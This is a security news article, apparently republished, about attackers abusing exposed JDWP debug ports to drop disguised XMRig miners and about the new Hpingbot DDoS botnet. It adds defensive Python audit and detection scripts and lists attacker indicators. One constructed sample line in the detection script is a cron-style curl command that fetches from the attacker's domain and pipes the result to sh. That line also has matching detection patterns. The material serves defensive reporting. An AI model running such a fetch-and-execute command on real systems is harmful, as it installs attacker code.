
Exposed JDWP Interfaces Lead to Crypto Mining, Hpingbot Targets SSH for DDoS

By Viral Trending Content

Threat actors are weaponizing exposed Java Debug Wire Protocol (JDWP) interfaces to obtain code execution capabilities and deploy cryptocurrency miners on compromised hosts.

“The attacker used a modified version of XMRig with a hard-coded configuration, allowing them to avoid suspicious command-line arguments that are often flagged by defenders,” Wiz researchers Yaara Shriki and Gili Tikochinski said in a report published this week. “The payload used mining pool proxies to hide their cryptocurrency wallet address, thereby preventing investigators from pivoting on it.”

The cloud security firm, which is being acquired by Google Cloud, said it observed the activity against its honeypot servers running TeamCity, a popular continuous integration and continuous delivery (CI/CD) tool.

JDWP is a communication protocol used in Java for debugging purposes. With JDWP, users can leverage a debugger to work in a different process, a Java application, on the same computer, or on a remote computer.

But given that JDWP lacks authentication or access control mechanisms, exposing the service to the internet can open up a new attack vector that attackers can abuse as an entry point, enabling full control over the running Java process.

Simply put, the misconfiguration can be abused to inject and execute arbitrary commands in order to set up persistence and ultimately run malicious payloads.


“While JDWP is not enabled by default in most Java applications, it is commonly used in development and debugging environments,” Wiz said. “Many popular applications automatically start a JDWP server when run in debug mode, often without making the risks obvious to the developer. If improperly secured or left exposed, this can open the door to remote code execution (RCE) vulnerabilities.”

Some of the applications that may launch a JDWP server when in debug mode include TeamCity, Jenkins, Selenium Grid, Elasticsearch, Quarkus, Spring Boot, and Apache Tomcat.
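One way to audit your own hosts for the misconfiguration described above is to classify each JVM command line by how its JDWP agent is bound. This is an added example, not code from Wiz or the article; the function names and the sample command lines are constructed, and the JDK-version rule for a bare port is stated as an assumption in the comments.

```python
import re

# Matches the modern (-agentlib:jdwp=) and legacy (-Xrunjdwp:) agent syntax.
JDWP_OPT = re.compile(r"(?:-agentlib:jdwp=|-Xrunjdwp:)(\S+)")
LOOPBACK = {"localhost", "127.0.0.1", "::1", "[::1]"}

def classify_jdwp(cmdline, jdk_major=17):
    """Return (status, detail); status is none, outbound, loopback or exposed.

    Assumption: a bare port (address=5005) binds to all interfaces before
    JDK 9 and to localhost only from JDK 9 onward, so the JDK major version
    of the audited JVM has to be supplied by the caller.
    """
    m = JDWP_OPT.search(cmdline)
    if not m:
        return ("none", "no JDWP agent option")
    opts = dict(kv.split("=", 1) for kv in m.group(1).split(",") if "=" in kv)
    if opts.get("server", "n") != "y":
        return ("outbound", "JVM dials out to a debugger, no listener")
    host, _, port = opts.get("address", "").rpartition(":")
    port = port or "ephemeral"
    if not host:  # bare port or no address at all
        if jdk_major >= 9:
            return ("loopback", f"port {port}, localhost-only default")
        return ("exposed", f"port {port}, pre-JDK 9 binds all interfaces")
    if host in LOOPBACK:
        return ("loopback", f"port {port} on {host}")
    return ("exposed", f"port {port} on {host}")

def audit(cmdlines, jdk_major=17):
    """Return only the command lines whose debugger listener is reachable."""
    out = []
    for line in cmdlines:
        status, detail = classify_jdwp(line, jdk_major)
        if status == "exposed":
            out.append((line, detail))
    return out

# Constructed sample command lines (not taken from any real host).
SAMPLES = [
    "java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005 -jar app.jar",
    "java -Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=5005 -jar old.jar",
    "java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=127.0.0.1:5005 -jar app.jar",
    "java -jar app.jar",
]

if __name__ == "__main__":
    for line, detail in audit(SAMPLES):
        print("EXPOSED:", detail, "<-", line)
```

A loopback result still leaves the debugger open to any local user or to anything that can forward the port, so debug flags are best kept out of production start scripts altogether.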

Data from GreyNoise shows more than 2,600 IP addresses scanning for JDWP endpoints within the last 24 hours, out of which over 1,500 IP addresses are malicious and 1,100 IP addresses are classified as suspicious. The vast majority of these IP addresses originate from China, the United States, Germany, Singapore, and Hong Kong.

In the attacks observed by Wiz, threat actors take advantage of the fact that the Java Virtual Machine (JVM) listens for debugger connections on port 5005 to initiate scanning for open JDWP ports across the internet. In the next phase, a JDWP-Handshake request is sent to confirm if the interface is active and establish a JDWP session.

Once it’s confirmed that the service is exposed and interactive, the attackers move to execute a curl command to fetch and execute a dropper shell script that performs a series of actions –

  • Kill competing miners or any high‐CPU processes
  • Drop a modified version of XMRig miner for the appropriate system architecture from an external server (“awarmcorner[.]world”) into “~/.config/logrotate”
  • Establish persistence by setting cron jobs to ensure that payload is re-fetched and re-executed after every shell login, reboot, or a scheduled time interval
  • Delete itself on exit

“Being open-source, XMRig offers attackers the convenience of easy customization, which in this case involved stripping out all command-line parsing logic and hardcoding the configuration,” Wiz said. “This tweak not only simplifies deployment but also allows the payload to mimic the original logrotate process more convincingly.”
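The dropper behaviour listed above leaves two things a defender can hunt for: a process named logrotate running from a user's `.config` directory, and cron or shell-profile lines that re-fetch the payload. The following is an added detection sketch, not part of the Wiz report; the function names, process tuples and sample lines are constructed, and `PLACEHOLDER` stands in for a URL path the article does not give.

```python
import re

# Domain from the article, stored defanged and refanged only for matching.
IOC_DOMAIN = "awarmcorner[.]world".replace("[.]", ".")
# Miner path from the article ("~/.config/logrotate") under any home directory.
FAKE_LOGROTATE = re.compile(r"^(/root|/home/[^/]+)/\.config/logrotate$")
FETCHER = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba)?sh\b")

def check_process(exe_path):
    """True when a process executable sits at the disguised miner path."""
    return bool(FAKE_LOGROTATE.match(exe_path))

def check_line(line):
    """Return the reasons a crontab or shell-profile line looks like the dropper."""
    line = line.strip()
    if not line or line.startswith("#"):
        return []
    reasons = []
    if IOC_DOMAIN in line:
        reasons.append("ioc-domain")
    if "/.config/logrotate" in line:
        reasons.append("miner-path")
    if FETCHER.search(line) and PIPE_TO_SHELL.search(line):
        reasons.append("fetch-pipe-shell")
    return reasons

def scan(processes, lines):
    """processes: (pid, exe_path) pairs; lines: crontab/profile text lines."""
    hits = [("process", pid, ["miner-path"])
            for pid, exe in processes if check_process(exe)]
    for n, line in enumerate(lines, 1):
        reasons = check_line(line)
        if reasons:
            hits.append(("line", n, reasons))
    return hits

# Constructed sample data: one legitimate logrotate and one disguised miner.
PROCESSES = [(812, "/usr/sbin/logrotate"), (4410, "/home/build/.config/logrotate")]
LINES = [
    "0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf",
    f"@reboot curl -fsSL http://{IOC_DOMAIN}/PLACEHOLDER | sh",
    "*/30 * * * * $HOME/.config/logrotate",
]

if __name__ == "__main__":
    for hit in scan(PROCESSES, LINES):
        print(hit)
```

On a live host the process pairs would come from `/proc/<pid>/exe` and the lines from user crontabs and login scripts; because the miner carries no command-line arguments, the executable path is the more reliable signal.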

New Hpingbot Botnet Emerges

The disclosure comes as NSFOCUS detailed a new, rapidly-evolving Go-based malware named Hpingbot that’s capable of targeting both Windows and Linux systems to enlist them into a botnet that can launch distributed denial-of-service (DDoS) attacks using hping3, a freely-available utility for crafting and sending custom ICMP/TCP/UDP packets.

A notable aspect of the malware is that unlike other trojans that are typically derived from known botnet malware families like Mirai and Gafgyt, Hpingbot is an entirely new strain. At least since June 17, 2025, a few hundred DDoS instructions have been issued, with Germany, the United States, and Turkey being the main targets.

“This is a new botnet family built from scratch, showing strong innovation capabilities and efficiency in using existing resources, such as distributing loads through the online text storage and sharing platform Pastebin and launching DDoS attacks using the network testing tool hping3, which not only improves stealth but also significantly reduces development and operating costs,” the Chinese cybersecurity company said.


Hpingbot primarily takes advantage of weak SSH configurations, propagated by means of an independent module that carries out password spraying attacks to obtain initial access to systems.

The presence of German debugging comments in the source code likely indicates that the latest version may be under testing. The attack chain, in a nutshell, involves using Pastebin as a dead drop resolver to point to an IP address (“128.0.118[.]18”) that, in turn, is employed to download a shell script.

The script is then used to detect the CPU architecture of the infected host, terminate an already running version of the trojan, and retrieve the main payload that’s responsible for initiating DDoS flood attacks over TCP and UDP. Hpingbot is also designed to establish persistence and cover up traces of infection by clearing the command history.

In an interesting twist, attackers have been observed using nodes controlled by Hpingbot to deliver another Go-based DDoS component as of June 19 that, while relying on the same command-and-control (C2) server, eschews Pastebin and hping3 calls for built-in flood attack functions based on UDP and TCP protocols.

Another aspect worth mentioning is that although the Windows version cannot use hping3 to launch DDoS attacks due to the fact that the tool is installed using the Linux command “apt -y install,” the ability of the malware to drop and execute additional payloads hints at the possibility that the threat actors intend to go beyond service disruption to turn it into a payload distribution network.

“It is worth noting that the Windows version of Hpingbot cannot directly call hping3 to launch DDoS attacks, but its activity is just as frequent, indicating that attackers are not only focusing on launching DDoS, but are more likely to focus on its function of downloading and executing arbitrary payloads.”
